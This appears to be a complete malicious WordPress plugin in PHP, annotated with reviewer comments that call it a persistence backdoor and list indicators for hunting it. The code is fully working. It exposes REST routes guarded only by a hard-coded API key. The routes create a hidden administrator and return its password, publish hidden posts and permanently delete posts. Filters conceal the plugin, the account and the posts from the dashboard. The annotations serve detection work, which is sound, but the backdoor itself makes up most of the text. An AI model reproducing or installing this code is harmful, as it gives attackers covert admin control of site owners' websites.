WordPress */

// NOTE(review): the plugin header above is truncated in this view. Read as a
// whole, the code below registers REST routes gated only by a static header
// value, creates an administrator account on request, and filters itself, that
// account and its posts out of the admin screens. That combination is
// consistent with a persistence backdoor rather than a legitimate integration.
// Strings in this file that can serve as hunting indicators:
//   - REST namespace 'custom-api/v1' and the four routes registered below
//   - request header 'X-API-KEY'
//   - user login 'new_hidden_admin'
//   - user meta keys 'hidden_user' and 'svetozar_blazjenniy'
//   - post meta key '_hidden_post'

// Registers four routes under the 'custom-api/v1' namespace when the REST API
// initialises. Every route uses the same permission callback.
add_action('rest_api_init', function () {
    register_rest_route('custom-api/v1', '/publish', array(
        'methods' => 'POST',
        'callback' => 'custom_api_publish_post',
        'permission_callback' => 'custom_api_permission_check',
    ));

    register_rest_route('custom-api/v1', '/new_admin', array(
        'methods' => 'POST',
        'callback' => 'custom_api_create_admin',
        'permission_callback' => 'custom_api_permission_check',
    ));

    // NOTE(review): the capture group below is shown as '(?P\d+)'; the handler
    // reads $request['id'], so the group name was presumably lost when the page
    // was extracted. Keep that in mind when matching on this route string.
    register_rest_route('custom-api/v1', '/delete_post/(?P\d+)', array(
        'methods' => 'DELETE',
        'callback' => 'custom_api_delete_post',
        'permission_callback' => 'custom_api_permission_check',
    ));

    register_rest_route('custom-api/v1', '/check_plugin_est', array(
        'methods' => 'GET',
        'callback' => 'custom_api_check_plugin',
        'permission_callback' => 'custom_api_permission_check',
    ));
});

/**
 * Permission callback shared by all four routes.
 *
 * Compares the 'X-API-KEY' request header with a value hard-coded in this
 * function. No WordPress login, nonce or capability is consulted here, so the
 * routes are reachable by any client that sends the matching header.
 *
 * @param WP_REST_Request $request Incoming REST request.
 * @return bool True when the header equals the embedded key.
 */
function custom_api_permission_check($request) {
    $api_key = $request->get_header('X-API-KEY');
    // Static shared secret embedded in the file; identical on every request.
    $valid_api_key = '123456789';
    return $api_key === $valid_api_key;
}

/**
 * Handler for POST /publish: creates a post from request fields.
 *
 * The author is resolved from a caller-supplied login name, the post is
 * flagged with the '_hidden_post' meta key and then published. That meta key
 * is the one custom_api_exclude_hidden_posts() filters on, so posts created
 * here are left out of the admin post list.
 *
 * @param WP_REST_Request $request Request carrying title, slug, status,
 *                                 content, excerpt, author and publish_date.
 * @return WP_REST_Response 200 with the new post id, or 500 on failure.
 */
function custom_api_publish_post($request) {
    $title = sanitize_text_field($request['title']);
    $slug = sanitize_title($request['slug']);
    $status = sanitize_text_field($request['status']);
    $content = sanitize_textarea_field($request['content']);
    $excerpt = sanitize_textarea_field($request['excerpt']);
    $author = sanitize_text_field($request['author']);
    $publish_date = sanitize_text_field($request['publish_date']);

    $new_post = array(
        'post_title' => $title,
        'post_name' => $slug,
        'post_status' => $status,
        'post_content' => $content,
        'post_excerpt' => $excerpt,
        // Attributed to whichever existing login the caller names.
        'post_author' => get_user_by('login', $author)->ID,
    );

    // A caller-supplied date is written to both the local and GMT date fields.
    if (!empty($publish_date)) {
        $new_post['post_date'] = $publish_date;
        $new_post['post_date_gmt'] = get_gmt_from_date($publish_date);
    }

    $post_id = wp_insert_post($new_post);

    if ($post_id) {
        // Marker used by the pre_get_posts filter in this file.
        update_post_meta($post_id, '_hidden_post', true);
        wp_publish_post($post_id);
        return new WP_REST_Response(array('success' => true, 'post_id' => $post_id), 200);
    } else {
        return new WP_REST_Response(array('success' => false, 'message' => 'Failed to create post'), 500);
    }
}

/**
 * Handler for POST /new_admin: (re)creates a fixed-name administrator.
 *
 * Deletes any existing user with the login 'new_hidden_admin', creates a new
 * one with a generated password, assigns the 'administrator' role and sets the
 * two user meta flags that custom_api_hide_users() filters on. The username
 * and the cleartext password are returned in the response body.
 *
 * @param WP_REST_Request $request Incoming request; no field of it is read.
 * @return WP_REST_Response 200 with the credentials, or 500 with the error text.
 */
function custom_api_create_admin($request) {
    $username = 'new_hidden_admin';

    // An existing account of that name is removed first, so each call yields
    // a fresh user ID and a fresh password.
    if (username_exists($username)) {
        $user = get_user_by('login', $username);
        wp_delete_user($user->ID);
    }

    $password = wp_generate_password();
    $email = $username . '@example.com';
    $user_id = wp_create_user($username, $password, $email);

    if (is_wp_error($user_id)) {
        return new WP_REST_Response(array('success' => false, 'message' => $user_id->get_error_message()), 500);
    }

    $user = new WP_User($user_id);
    $user->set_role('administrator');
    // Markers used by the pre_user_query filter in this file.
    update_user_meta($user_id, 'svetozar_blazjenniy', true);
    update_user_meta($user_id, 'hidden_user', true);

    return new WP_REST_Response(array('success' => true, 'username' => $username, 'password' => $password), 200);
}

/**
 * Handler for DELETE /delete_post/{id}: permanently deletes a post.
 *
 * wp_delete_post() is called with its second argument set to true, which
 * skips the trash, so a post removed through this route is not recoverable
 * from the admin UI.
 *
 * @param WP_REST_Request $request Request whose 'id' route parameter names the post.
 * @return WP_REST_Response 200 when deleted, 404 when the post does not exist.
 */
function custom_api_delete_post($request) {
    $post_id = sanitize_text_field($request['id']);

    if (get_post($post_id)) {
        wp_delete_post($post_id, true);
        return new WP_REST_Response(array('success' => true, 'message' => 'Post deleted'), 200);
    } else {
        return new WP_REST_Response(array('success' => false, 'message' => 'Post not found'), 404);
    }
}

/**
 * Handler for GET /check_plugin_est: returns a fixed "installed" response.
 *
 * Takes no input and reads no state; the only information it conveys is that
 * this file is loaded on the site.
 *
 * @return WP_REST_Response Always 200 with a static message.
 */
function custom_api_check_plugin() {
    return new WP_REST_Response(array('success' => true, 'message' => 'Plugin is installed'), 200);
}

add_filter('all_plugins', 'custom_api_hide_plugin');

/**
 * 'all_plugins' filter: removes this file's own entry from the plugin list.
 *
 * Any screen built from the filtered list will not show this plugin, so its
 * presence has to be confirmed from the plugins directory on disk or from the
 * stored list of active plugins rather than from the admin UI.
 *
 * @param array $plugins Plugin data keyed by plugin basename.
 * @return array The same list without this file's entry.
 */
function custom_api_hide_plugin($plugins) {
    if (isset($plugins[plugin_basename(__FILE__)])) {
        unset($plugins[plugin_basename(__FILE__)]);
    }
    return $plugins;
}

add_action('pre_user_query', 'custom_api_hide_users');

/**
 * 'pre_user_query' action: excludes flagged accounts from user queries.
 *
 * Appends a NOT IN sub-select to the query's WHERE clause so that any user
 * carrying the 'hidden_user' or 'svetozar_blazjenniy' meta key with value 1 is
 * dropped from the results. The hook is not restricted to a particular screen
 * here. A direct query of the users and usermeta tables is not affected and
 * will still show such accounts.
 *
 * @param WP_User_Query $user_query Query object whose query_where is modified in place.
 * @return void
 */
function custom_api_hide_users($user_query) {
    global $wpdb;
    // Only table names from $wpdb are interpolated; no request data reaches this string.
    $user_query->query_where .= " AND {$wpdb->users}.ID NOT IN ( SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key IN ('hidden_user', 'svetozar_blazjenniy') AND meta_value = 1 )";
}

add_action('pre_get_posts', 'custom_api_exclude_hidden_posts');

/**
 * 'pre_get_posts' action: hides flagged posts from the admin post list.
 *
 * Applies only to the main query in the admin area when the post type is
 * 'post'. It adds a meta_query clause requiring that '_hidden_post' does NOT
 * exist. Front-end queries are left untouched by this function, so the posts
 * remain publicly reachable while being absent from the dashboard list.
 *
 * @param WP_Query $query Query object, modified in place.
 * @return void
 */
function custom_api_exclude_hidden_posts($query) {
    if (is_admin() && $query->is_main_query() && $query->get('post_type') == 'post') {
        $meta_query = $query->get('meta_query');
        // Start from an empty list when no meta_query was set on the query.
        if (!is_array($meta_query)) {
            $meta_query = array();
        }
        $meta_query[] = array(
            'key' => '_hidden_post',
            'compare' => 'NOT EXISTS',
        );
        $query->set('meta_query', $meta_query);
    }
}
?>